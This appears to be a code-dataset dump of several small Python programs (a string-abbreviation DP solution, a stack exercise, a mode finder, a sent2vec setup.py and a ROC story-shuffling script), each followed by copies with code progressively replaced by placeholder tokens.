[ "\"\"\"\nYou can perform the following operations on the string, :\n\nCapitalize zero or more of 's lowercase letters.\nDelete all of the remaining lowercase letters in .\nGiven two strings, and , determine if it's possible to make equal to as described. If so, print YES on a new line. Otherwise, print NO.\n\nFor example, given and , in we can convert and delete to match . If and , matching is not possible because letters may only be capitalized or discarded, not changed.\n\nFunction Description\n\nComplete the function in the editor below. It must return either or .\n\nabbreviation has the following parameter(s):\n\na: the string to modify\nb: the string to match\nInput Format\n\nThe first line contains a single integer , the number of queries.\n\nEach of the next pairs of lines is as follows:\n- The first line of each query contains a single string, .\n- The second line of each query contains a single string, .\n\nConstraints\n\nString consists only of uppercase and lowercase English letters, ascii[A-Za-z].\nString consists only of uppercase English letters, ascii[A-Z].\nOutput Format\n\nFor each query, print YES on a new line if it's possible to make string equal to string . Otherwise, print NO.\n\nSample Input\n\n1\ndaBcd\nABC\nSample Output\n\nYES\nExplanation\n\nimage\n\nWe have daBcd and ABC. We perform the following operation:\n\nCapitalize the letters a and c in so that dABCd.\nDelete all the remaining lowercase letters in so that ABC.\nBecause we were able to successfully convert to , we print YES on a new line.\n\n\n\"\"\"\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# Complete the abbreviation function below.\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [[False]*(m+1) for _ in range(n+1)]\n dp[0][0] = True\n for i in range(n+1):\n for j in range(1,m+1):\n if a[j-1] == b[i-1]:\n dp[i][j] = dp[i-1][j-1]\n elif a[j-1].upper() == b[i-1]:\n dp[i][j] = dp[i-1][j-1] or dp[i][j-1]\n elif a[j-1].islower():\n dp[i][j] = dp[i][j-1]\n return \"YES\" if dp[n][m] else \"NO\"\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n q = int(input())\n\n for q_itr in range(q):\n a = input()\n\n b = input()\n\n result = abbreviation(a, b)\n\n fptr.write(result + '\\n')\n\n fptr.close()\n", "<docstring token>\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [([False] * (m + 1)) for _ in range(n + 1)]\n dp[0][0] = True\n for i in range(n + 1):\n for j in range(1, m + 1):\n if a[j - 1] == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n elif a[j - 1].upper() == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]\n elif a[j - 1].islower():\n dp[i][j] = dp[i][j - 1]\n return 'YES' if dp[n][m] else 'NO'\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n q = int(input())\n for q_itr in range(q):\n a = input()\n b = input()\n result = abbreviation(a, b)\n fptr.write(result + '\\n')\n fptr.close()\n", "<docstring token>\n<import token>\n\n\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [([False] * (m + 1)) for _ in range(n + 1)]\n dp[0][0] = True\n for i in range(n + 1):\n for j in range(1, m + 1):\n if a[j - 1] == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n elif a[j - 1].upper() == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]\n elif a[j - 1].islower():\n dp[i][j] = dp[i][j - 1]\n return 'YES' if dp[n][m] else 'NO'\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n q = int(input())\n 
for q_itr in range(q):\n a = input()\n b = input()\n result = abbreviation(a, b)\n fptr.write(result + '\\n')\n fptr.close()\n", "<docstring token>\n<import token>\n\n\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [([False] * (m + 1)) for _ in range(n + 1)]\n dp[0][0] = True\n for i in range(n + 1):\n for j in range(1, m + 1):\n if a[j - 1] == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n elif a[j - 1].upper() == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]\n elif a[j - 1].islower():\n dp[i][j] = dp[i][j - 1]\n return 'YES' if dp[n][m] else 'NO'\n\n\n<code token>\n", "<docstring token>\n<import token>\n<function token>\n<code token>\n" ]
false
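In the record above, dp[i][j] reads as "the first j characters of a can be turned into the first i characters of b"; an uppercase character of a must be matched, a lowercase one may be capitalized or deleted. A minimal sanity check, assuming the abbreviation function from the record is in scope (the second input pair is an invented example, not from the problem statement):

# Illustrative checks against abbreviation() defined above; the inputs in the
# second assert are hypothetical, chosen so no capitalization can match.
assert abbreviation('daBcd', 'ABC') == 'YES'  # the docstring's sample case
assert abbreviation('AbcDE', 'AFDE') == 'NO'  # 'F' never occurs in the first string
print('abbreviation checks passed')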
24
5ed439a2a7cfb9c941c40ea0c5eba2851a0f2855
#!/bin/python3

# Implement a stack with push, pop, inc(e, k) operations
# inc (e,k) - Add k to each of bottom e elements
import sys

class Stack(object):
    def __init__(self):
        self.arr = []

    def push(self, val):
        self.arr.append(val)

    def pop(self):
        if len(self.arr):
            return self.arr.pop()

    def inc(self, e, k):
        count = min(len(self.arr), e)
        for i in range(count):
            self.arr[i] += k

    def peek(self):
        if len(self.arr):
            return self.arr[-1]
        else:
            return 'EMPTY'

def superStack(operations):
    s = Stack()
    for o in operations:
        op = o.split(' ')
        if op[0] == 'push':
            s.push(int(op[1]))
            print(s.peek())
        elif op[0] == 'pop':
            s.pop()
            print(s.peek())
        elif op[0] == 'inc':
            s.inc(int(op[1]), int(op[2]))
            print(s.peek())

if __name__ == "__main__":
    operations_cnt = 0
    operations_cnt = int(input())
    operations_i = 0
    operations = []
    while operations_i < operations_cnt:
        try:
            operations_item = str(input())
        except:
            operations_item = None
        operations.append(operations_item)
        operations_i += 1

    res = superStack(operations);
[ "#!/bin/python3\n\n# Implement a stack with push, pop, inc(e, k) operations\n# inc (e,k) - Add k to each of bottom e elements\nimport sys\n\nclass Stack(object):\n def __init__(self):\n self.arr = []\n\n def push(self, val):\n self.arr.append(val)\n\n def pop(self):\n if len(self.arr):\n return self.arr.pop()\n\n def inc(self, e, k):\n count = min(len(self.arr), e)\n for i in range(count):\n self.arr[i] += k\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\ndef superStack(operations):\n s = Stack()\n for o in operations:\n op = o.split(' ')\n if op[0] == 'push':\n s.push(int(op[1]))\n print(s.peek())\n elif op[0] == 'pop':\n s.pop()\n print(s.peek())\n elif op[0] == 'inc':\n s.inc(int(op[1]), int(op[2]))\n print(s.peek())\n \n\nif __name__ == \"__main__\":\n operations_cnt = 0\n operations_cnt = int(input())\n operations_i = 0\n operations = []\n while operations_i < operations_cnt:\n try:\n operations_item = str(input())\n except:\n operations_item = None\n operations.append(operations_item)\n operations_i += 1\n\n\n res = superStack(operations);\n \n\n", "import sys\n\n\nclass Stack(object):\n\n def __init__(self):\n self.arr = []\n\n def push(self, val):\n self.arr.append(val)\n\n def pop(self):\n if len(self.arr):\n return self.arr.pop()\n\n def inc(self, e, k):\n count = min(len(self.arr), e)\n for i in range(count):\n self.arr[i] += k\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\ndef superStack(operations):\n s = Stack()\n for o in operations:\n op = o.split(' ')\n if op[0] == 'push':\n s.push(int(op[1]))\n print(s.peek())\n elif op[0] == 'pop':\n s.pop()\n print(s.peek())\n elif op[0] == 'inc':\n s.inc(int(op[1]), int(op[2]))\n print(s.peek())\n\n\nif __name__ == '__main__':\n operations_cnt = 0\n operations_cnt = int(input())\n operations_i = 0\n operations = []\n while operations_i < operations_cnt:\n try:\n operations_item = str(input())\n except:\n operations_item = None\n operations.append(operations_item)\n operations_i += 1\n res = superStack(operations)\n", "<import token>\n\n\nclass Stack(object):\n\n def __init__(self):\n self.arr = []\n\n def push(self, val):\n self.arr.append(val)\n\n def pop(self):\n if len(self.arr):\n return self.arr.pop()\n\n def inc(self, e, k):\n count = min(len(self.arr), e)\n for i in range(count):\n self.arr[i] += k\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\ndef superStack(operations):\n s = Stack()\n for o in operations:\n op = o.split(' ')\n if op[0] == 'push':\n s.push(int(op[1]))\n print(s.peek())\n elif op[0] == 'pop':\n s.pop()\n print(s.peek())\n elif op[0] == 'inc':\n s.inc(int(op[1]), int(op[2]))\n print(s.peek())\n\n\nif __name__ == '__main__':\n operations_cnt = 0\n operations_cnt = int(input())\n operations_i = 0\n operations = []\n while operations_i < operations_cnt:\n try:\n operations_item = str(input())\n except:\n operations_item = None\n operations.append(operations_item)\n operations_i += 1\n res = superStack(operations)\n", "<import token>\n\n\nclass Stack(object):\n\n def __init__(self):\n self.arr = []\n\n def push(self, val):\n self.arr.append(val)\n\n def pop(self):\n if len(self.arr):\n return self.arr.pop()\n\n def inc(self, e, k):\n count = min(len(self.arr), e)\n for i in range(count):\n self.arr[i] += k\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\ndef superStack(operations):\n s = Stack()\n for o in operations:\n op = o.split(' ')\n if 
op[0] == 'push':\n s.push(int(op[1]))\n print(s.peek())\n elif op[0] == 'pop':\n s.pop()\n print(s.peek())\n elif op[0] == 'inc':\n s.inc(int(op[1]), int(op[2]))\n print(s.peek())\n\n\n<code token>\n", "<import token>\n\n\nclass Stack(object):\n\n def __init__(self):\n self.arr = []\n\n def push(self, val):\n self.arr.append(val)\n\n def pop(self):\n if len(self.arr):\n return self.arr.pop()\n\n def inc(self, e, k):\n count = min(len(self.arr), e)\n for i in range(count):\n self.arr[i] += k\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\n<function token>\n<code token>\n", "<import token>\n\n\nclass Stack(object):\n\n def __init__(self):\n self.arr = []\n\n def push(self, val):\n self.arr.append(val)\n\n def pop(self):\n if len(self.arr):\n return self.arr.pop()\n <function token>\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\n<function token>\n<code token>\n", "<import token>\n\n\nclass Stack(object):\n\n def __init__(self):\n self.arr = []\n\n def push(self, val):\n self.arr.append(val)\n <function token>\n <function token>\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\n<function token>\n<code token>\n", "<import token>\n\n\nclass Stack(object):\n\n def __init__(self):\n self.arr = []\n <function token>\n <function token>\n <function token>\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\n<function token>\n<code token>\n", "<import token>\n\n\nclass Stack(object):\n <function token>\n <function token>\n <function token>\n <function token>\n\n def peek(self):\n if len(self.arr):\n return self.arr[-1]\n else:\n return 'EMPTY'\n\n\n<function token>\n<code token>\n", "<import token>\n\n\nclass Stack(object):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<code token>\n", "<import token>\n<class token>\n<function token>\n<code token>\n" ]
false
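Stack.inc above walks up to e slots per call, so heavy use of inc on a deep stack degrades toward O(n) per operation. A common constant-time alternative keeps one pending increment per slot and settles it on pop; a sketch under the same 'push/pop/inc' input format (super_stack_lazy is a name introduced here, not the record's):

def super_stack_lazy(operations):
    vals, incs = [], []          # incs[i] applies to every element at index <= i
    out = []
    for o in operations:
        op = o.split()
        if op[0] == 'push':
            vals.append(int(op[1]))
            incs.append(0)
        elif op[0] == 'pop':
            if vals:
                vals.pop()
                carry = incs.pop()
                if incs:
                    incs[-1] += carry        # the increment still covers the rest
        else:                                # 'inc e k'
            e, k = int(op[1]), int(op[2])
            if vals:
                incs[min(e, len(vals)) - 1] += k
        out.append(vals[-1] + incs[-1] if vals else 'EMPTY')
    return out

print(super_stack_lazy(['push 4', 'push 9', 'inc 2 3', 'pop', 'pop']))
# [4, 9, 12, 7, 'EMPTY']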
25
39f9341313e29a22ec5e05ce9371bf65e89c91bd
""" 리스트에 있는 숫자들의 최빈값을 구하는 프로그램을 만들어라. [12, 17, 19, 17, 23] = 17 [26, 37, 26, 37, 91] = 26, 37 [28, 30, 32, 34, 144] = 없다 최빈값 : 자료의 값 중에서 가장 많이 나타난 값 ① 자료의 값이 모두 같거나 모두 다르면 최빈값은 없다. ② 자료의 값이 모두 다를 때, 도수가 가장 큰 값이 1개 이상 있으면 그 값은 모두 최빈값이다. """ n_list = [[12, 17, 19, 17, 23], [26, 37, 26, 37, 91], [28, 30, 32, 34, 144], [10, 10, 10, 10, 10]] for numbers in n_list: n_dict = {} for n in numbers: if n in n_dict: n_dict[n] += 1 else: n_dict[n] = 1 mode = [] if len(n_dict) == 1 or len(n_dict) == len(numbers): print(numbers, '= 없다') else: mode_count = max(n_dict.values()) for e in n_dict.keys(): if n_dict[e] == mode_count: mode.append(e) print(numbers, '=', mode)
[ "\"\"\"\n리스트에 있는 숫자들의 최빈값을 구하는 프로그램을 만들어라.\n\n[12, 17, 19, 17, 23] = 17\n[26, 37, 26, 37, 91] = 26, 37\n[28, 30, 32, 34, 144] = 없다\n\n최빈값 : 자료의 값 중에서 가장 많이 나타난 값 \n① 자료의 값이 모두 같거나 모두 다르면 최빈값은 없다.\n② 자료의 값이 모두 다를 때, 도수가 가장 큰 값이 1개 이상 있으면 그 값은 모두 최빈값이다.\n\"\"\"\n\nn_list = [[12, 17, 19, 17, 23],\n [26, 37, 26, 37, 91],\n [28, 30, 32, 34, 144],\n [10, 10, 10, 10, 10]]\n \nfor numbers in n_list:\n n_dict = {}\n for n in numbers:\n if n in n_dict:\n n_dict[n] += 1\n else:\n n_dict[n] = 1\n mode = []\n if len(n_dict) == 1 or len(n_dict) == len(numbers):\n print(numbers, '= 없다')\n else:\n mode_count = max(n_dict.values())\n for e in n_dict.keys():\n if n_dict[e] == mode_count:\n mode.append(e)\n print(numbers, '=', mode)\n", "<docstring token>\nn_list = [[12, 17, 19, 17, 23], [26, 37, 26, 37, 91], [28, 30, 32, 34, 144],\n [10, 10, 10, 10, 10]]\nfor numbers in n_list:\n n_dict = {}\n for n in numbers:\n if n in n_dict:\n n_dict[n] += 1\n else:\n n_dict[n] = 1\n mode = []\n if len(n_dict) == 1 or len(n_dict) == len(numbers):\n print(numbers, '= 없다')\n else:\n mode_count = max(n_dict.values())\n for e in n_dict.keys():\n if n_dict[e] == mode_count:\n mode.append(e)\n print(numbers, '=', mode)\n", "<docstring token>\n<assignment token>\nfor numbers in n_list:\n n_dict = {}\n for n in numbers:\n if n in n_dict:\n n_dict[n] += 1\n else:\n n_dict[n] = 1\n mode = []\n if len(n_dict) == 1 or len(n_dict) == len(numbers):\n print(numbers, '= 없다')\n else:\n mode_count = max(n_dict.values())\n for e in n_dict.keys():\n if n_dict[e] == mode_count:\n mode.append(e)\n print(numbers, '=', mode)\n", "<docstring token>\n<assignment token>\n<code token>\n" ]
false
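The frequency dict built by hand above is exactly what collections.Counter provides; the same no-mode rule (all values equal or all distinct) expressed with it, as a sketch (modes is a name introduced here):

from collections import Counter

def modes(numbers):
    counts = Counter(numbers)
    if len(counts) in (1, len(numbers)):      # all equal or all distinct: no mode
        return None
    top = max(counts.values())
    return [v for v, c in counts.items() if c == top]

for numbers in [[12, 17, 19, 17, 23], [26, 37, 26, 37, 91],
                [28, 30, 32, 34, 144], [10, 10, 10, 10, 10]]:
    print(numbers, '=', modes(numbers))       # None stands in for "no mode"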
26
312cc666c88fcd22882c49598db8c5e18bd3dae1
from setuptools import setup, find_packages
from setuptools.extension import Extension
from sys import platform

cython = True

try:
    from Cython.Build import cythonize
    cython = True
except ImportError:
    cython = False

# Define the C++ extension
if platform == "darwin":
    extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x', '-stdlib=libc++', '-mmacosx-version-min=10.7']
else:
    extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']

extensions = []

if cython:
    extensions = [
        Extension('sent2vec',
            sources=[
                'sent2vec/sent2vec.pyx',
                'sent2vec/cpp/src/args.cc',
                'sent2vec/cpp/src/dictionary.cc',
                'sent2vec/cpp/src/fasttext.cc',
                'sent2vec/cpp/src/main.cc',
                'sent2vec/cpp/src/matrix.cc',
                'sent2vec/cpp/src/model.cc',
                'sent2vec/cpp/src/productquantizer.cc',
                'sent2vec/cpp/src/qmatrix.cc',
                'sent2vec/cpp/src/utils.cc',
                'sent2vec/cpp/src/vector.cc'
            ],
            language='c++',
            extra_compile_args=extra_compile_args
        )
    ]

    extensions = cythonize(extensions)
else:
    extensions = [
        Extension('sent2vec',
            sources=[
                'sent2vec/sent2vec.cpp',
                'sent2vec/cpp/src/args.cc',
                'sent2vec/cpp/src/dictionary.cc',
                'sent2vec/cpp/src/fasttext.cc',
                'sent2vec/cpp/src/main.cc',
                'sent2vec/cpp/src/matrix.cc',
                'sent2vec/cpp/src/model.cc',
                'sent2vec/cpp/src/productquantizer.cc',
                'sent2vec/cpp/src/qmatrix.cc',
                'sent2vec/cpp/src/utils.cc',
                'sent2vec/cpp/src/vector.cc'
            ],
            language='c++',
            extra_compile_args=extra_compile_args
        )
    ]

# Package details
setup(
    name='sent2vec',
    version='0.1.0',
    author='',
    author_email='',
    url='',
    description='A Python interface for sent2vec library',
    license='BSD 3-Clause License',
    packages=['sent2vec'],
    ext_modules = extensions,
    install_requires=[],
    classifiers= []
)
[ "from setuptools import setup, find_packages\nfrom setuptools.extension import Extension\nfrom sys import platform\n\ncython = True\n\ntry:\n from Cython.Build import cythonize\n cython = True\nexcept ImportError:\n cython = False\n\n# Define the C++ extension\nif platform == \"darwin\":\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x', '-stdlib=libc++', '-mmacosx-version-min=10.7']\nelse:\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']\n\nextensions = []\n\nif cython:\n extensions = [\n Extension('sent2vec',\n sources=[\n 'sent2vec/sent2vec.pyx',\n 'sent2vec/cpp/src/args.cc',\n 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc',\n 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc',\n 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc',\n 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'\n ],\n language='c++',\n extra_compile_args=extra_compile_args\n )\n ]\n\n extensions = cythonize(extensions)\nelse:\n extensions = [\n Extension('sent2vec',\n sources=[\n 'sent2vec/sent2vec.cpp',\n 'sent2vec/cpp/src/args.cc',\n 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc',\n 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc',\n 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc',\n 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'\n ],\n language='c++',\n extra_compile_args=extra_compile_args\n )\n ]\n\n# Package details\nsetup(\n name='sent2vec',\n version='0.1.0',\n author='',\n author_email='',\n url='',\n description='A Python interface for sent2vec library',\n license='BSD 3-Clause License',\n packages=['sent2vec'],\n ext_modules = extensions,\n install_requires=[],\n classifiers= []\n)\n", "from setuptools import setup, find_packages\nfrom setuptools.extension import Extension\nfrom sys import platform\ncython = True\ntry:\n from Cython.Build import cythonize\n cython = True\nexcept ImportError:\n cython = False\nif platform == 'darwin':\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x',\n '-stdlib=libc++', '-mmacosx-version-min=10.7']\nelse:\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']\nextensions = []\nif cython:\n extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.pyx',\n 'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=\n extra_compile_args)]\n extensions = cythonize(extensions)\nelse:\n extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.cpp',\n 'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=\n extra_compile_args)]\nsetup(name='sent2vec', version='0.1.0', author='', author_email='', url='',\n description='A Python interface for sent2vec library', license=\n 'BSD 3-Clause License', packages=['sent2vec'], ext_modules=extensions,\n install_requires=[], classifiers=[])\n", "<import 
token>\ncython = True\ntry:\n from Cython.Build import cythonize\n cython = True\nexcept ImportError:\n cython = False\nif platform == 'darwin':\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x',\n '-stdlib=libc++', '-mmacosx-version-min=10.7']\nelse:\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']\nextensions = []\nif cython:\n extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.pyx',\n 'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=\n extra_compile_args)]\n extensions = cythonize(extensions)\nelse:\n extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.cpp',\n 'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=\n extra_compile_args)]\nsetup(name='sent2vec', version='0.1.0', author='', author_email='', url='',\n description='A Python interface for sent2vec library', license=\n 'BSD 3-Clause License', packages=['sent2vec'], ext_modules=extensions,\n install_requires=[], classifiers=[])\n", "<import token>\n<assignment token>\ntry:\n from Cython.Build import cythonize\n cython = True\nexcept ImportError:\n cython = False\nif platform == 'darwin':\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x',\n '-stdlib=libc++', '-mmacosx-version-min=10.7']\nelse:\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']\n<assignment token>\nif cython:\n extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.pyx',\n 'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=\n extra_compile_args)]\n extensions = cythonize(extensions)\nelse:\n extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.cpp',\n 'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=\n extra_compile_args)]\nsetup(name='sent2vec', version='0.1.0', author='', author_email='', url='',\n description='A Python interface for sent2vec library', license=\n 'BSD 3-Clause License', packages=['sent2vec'], ext_modules=extensions,\n install_requires=[], classifiers=[])\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
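The try/except ImportError around Cython above is the usual "cythonize the .pyx when Cython is installed, otherwise compile the shipped .cpp" arrangement. The same pattern reduced to its core, as a sketch (mymod and its source files are placeholders, not part of this package):

from setuptools import setup
from setuptools.extension import Extension

try:
    from Cython.Build import cythonize
    # Cython present: regenerate the C++ from the .pyx at build time
    exts = cythonize([Extension('mymod', ['mymod.pyx'], language='c++')])
except ImportError:
    # No Cython: fall back to the pre-generated translation unit
    exts = [Extension('mymod', ['mymod.cpp'], language='c++')]

setup(name='mymod', ext_modules=exts)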
27
2aec0581413d4fb0ffb4090231fde0fed974bf18
import numpy as np
import random

with open("./roc.txt", "r") as fin:
    with open("./roc_shuffle.txt", "w") as fout:
        tmp = []
        for k, line in enumerate(fin):
            i = k + 1
            if i % 6 == 0:
                idx = [0] + np.random.permutation(range(1,5)).tolist()
                for sen in np.take(tmp, idx).tolist():
                    fout.write(sen+"\n")
                tmp = []
                fout.write(line.strip()+"\n")
            else:
                tmp.append(line.strip())
with open("./roc.txt", "r") as fin:
    with open("./roc_repeat.txt", "w") as fout:
        tmp = []
        for k, line in enumerate(fin):
            i = k + 1
            if i % 6 == 0:
                idx = random.randint(1,4)
                tmp[idx] = tmp[idx][:-1] + tmp[idx]
                for sen in tmp:
                    fout.write(sen+"\n")
                tmp = []
                fout.write(line.strip()+"\n")
            else:
                tmp.append(line.strip())
with open("./roc.txt", "r") as fin:
    with open("./roc_replace.txt", "w") as fout:
        post, tmp = [], []
        for k, line in enumerate(fin):
            i = k + 1
            if i % 6 == 0:
                post.append(tmp)
                tmp = []
            else:
                tmp.append(line.strip().split())
        data = {"1":[], "2":[], "3":[], "4":[], "5":[]}
        for p in post:
            for i in range(5):
                data["%d"%(i+1)].append(p[i])
        random_data = data.copy()
        for i in range(5):
            random_data["%d"%(i+1)] = np.random.permutation(random_data["%d"%(i+1)])

        for k in range(len(post)):
            idx = np.random.permutation(range(1,5))[0]
            for i in range(5):
                if i == idx:
                    fout.write(' '.join(random_data["%d"%(i+1)][k])+"\n")
                else:
                    fout.write(' '.join(data["%d"%(i+1)][k])+"\n")
            fout.write("------\n")
[ "import numpy as np\nimport random\n\nwith open(\"./roc.txt\", \"r\") as fin:\n with open(\"./roc_shuffle.txt\", \"w\") as fout:\n tmp = []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n idx = [0] + np.random.permutation(range(1,5)).tolist()\n for sen in np.take(tmp, idx).tolist():\n fout.write(sen+\"\\n\")\n tmp = []\n fout.write(line.strip()+\"\\n\")\n else:\n tmp.append(line.strip())\nwith open(\"./roc.txt\", \"r\") as fin:\n with open(\"./roc_repeat.txt\", \"w\") as fout:\n tmp = []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n idx = random.randint(1,4)\n tmp[idx] = tmp[idx][:-1] + tmp[idx]\n for sen in tmp:\n fout.write(sen+\"\\n\")\n tmp = []\n fout.write(line.strip()+\"\\n\")\n else:\n tmp.append(line.strip())\nwith open(\"./roc.txt\", \"r\") as fin:\n with open(\"./roc_replace.txt\", \"w\") as fout:\n post, tmp = [], []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n post.append(tmp)\n tmp = []\n else:\n tmp.append(line.strip().split())\n data = {\"1\":[], \"2\":[], \"3\":[], \"4\":[], \"5\":[]}\n for p in post:\n for i in range(5):\n data[\"%d\"%(i+1)].append(p[i])\n random_data = data.copy()\n for i in range(5):\n random_data[\"%d\"%(i+1)] = np.random.permutation(random_data[\"%d\"%(i+1)])\n\n for k in range(len(post)):\n idx = np.random.permutation(range(1,5))[0]\n for i in range(5):\n if i == idx:\n fout.write(' '.join(random_data[\"%d\"%(i+1)][k])+\"\\n\")\n else:\n fout.write(' '.join(data[\"%d\"%(i+1)][k])+\"\\n\")\n fout.write(\"------\\n\")", "import numpy as np\nimport random\nwith open('./roc.txt', 'r') as fin:\n with open('./roc_shuffle.txt', 'w') as fout:\n tmp = []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n idx = [0] + np.random.permutation(range(1, 5)).tolist()\n for sen in np.take(tmp, idx).tolist():\n fout.write(sen + '\\n')\n tmp = []\n fout.write(line.strip() + '\\n')\n else:\n tmp.append(line.strip())\nwith open('./roc.txt', 'r') as fin:\n with open('./roc_repeat.txt', 'w') as fout:\n tmp = []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n idx = random.randint(1, 4)\n tmp[idx] = tmp[idx][:-1] + tmp[idx]\n for sen in tmp:\n fout.write(sen + '\\n')\n tmp = []\n fout.write(line.strip() + '\\n')\n else:\n tmp.append(line.strip())\nwith open('./roc.txt', 'r') as fin:\n with open('./roc_replace.txt', 'w') as fout:\n post, tmp = [], []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n post.append(tmp)\n tmp = []\n else:\n tmp.append(line.strip().split())\n data = {'1': [], '2': [], '3': [], '4': [], '5': []}\n for p in post:\n for i in range(5):\n data['%d' % (i + 1)].append(p[i])\n random_data = 